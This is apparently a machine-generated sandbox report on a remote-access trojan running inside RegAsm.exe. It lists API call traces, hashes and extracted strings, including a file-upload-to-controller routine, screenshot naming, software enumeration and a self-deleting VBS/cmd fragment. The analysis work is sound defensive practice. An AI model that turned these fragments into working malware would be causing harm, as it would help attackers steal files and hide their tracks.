                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                • CloseHandle.KERNEL32 ref: 0040D068
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                • API String ID: 1579085052-2309681474
                                                                • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                APIs
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                • FindFirstVolumeW.KERNEL32 ref: 0041C133
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                • FindVolumeClose.KERNEL32 ref: 0041C1EC
                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                • lstrcatW.KERNEL32 ref: 0041C24A
                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                • String ID: ?
                                                                • API String ID: 3941738427-1684325040
                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                • API String ID: 4218353326-230879103
                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable
                                                                • String ID:
                                                                • API String ID: 1464849758-0
                                                                • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                • API String ID: 1332880857-3714951968
                                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                • API String ID: 3086580692-2582957567
                                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                • _free.LIBCMT ref: 10007CFB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10007D1D
                                                                • _free.LIBCMT ref: 10007D32
                                                                • _free.LIBCMT ref: 10007D3D
                                                                • _free.LIBCMT ref: 10007D5F
                                                                • _free.LIBCMT ref: 10007D72
                                                                • _free.LIBCMT ref: 10007D80
                                                                • _free.LIBCMT ref: 10007D8B
                                                                • _free.LIBCMT ref: 10007DC3
                                                                • _free.LIBCMT ref: 10007DCA
                                                                • _free.LIBCMT ref: 10007DE7
                                                                • _free.LIBCMT ref: 10007DFF
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                • _free.LIBCMT ref: 0045137F
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004513A1
                                                                • _free.LIBCMT ref: 004513B6
                                                                • _free.LIBCMT ref: 004513C1
                                                                • _free.LIBCMT ref: 004513E3
                                                                • _free.LIBCMT ref: 004513F6
                                                                • _free.LIBCMT ref: 00451404
                                                                • _free.LIBCMT ref: 0045140F
                                                                • _free.LIBCMT ref: 00451447
                                                                • _free.LIBCMT ref: 0045144E
                                                                • _free.LIBCMT ref: 0045146B
                                                                • _free.LIBCMT ref: 00451483
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                • API String ID: 489098229-1431523004
                                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                • API String ID: 1913171305-3159800282
                                                                • Opcode ID: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                • Opcode Fuzzy Hash: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                APIs
                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                • GetFileType.KERNEL32 ref: 00455D82
                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 65535$udp
                                                                • API String ID: 0-1267037602
                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                • _free.LIBCMT ref: 0043A9C3
                                                                • _free.LIBCMT ref: 0043A9CA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                • String ID:
                                                                • API String ID: 2441525078-0
                                                                • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
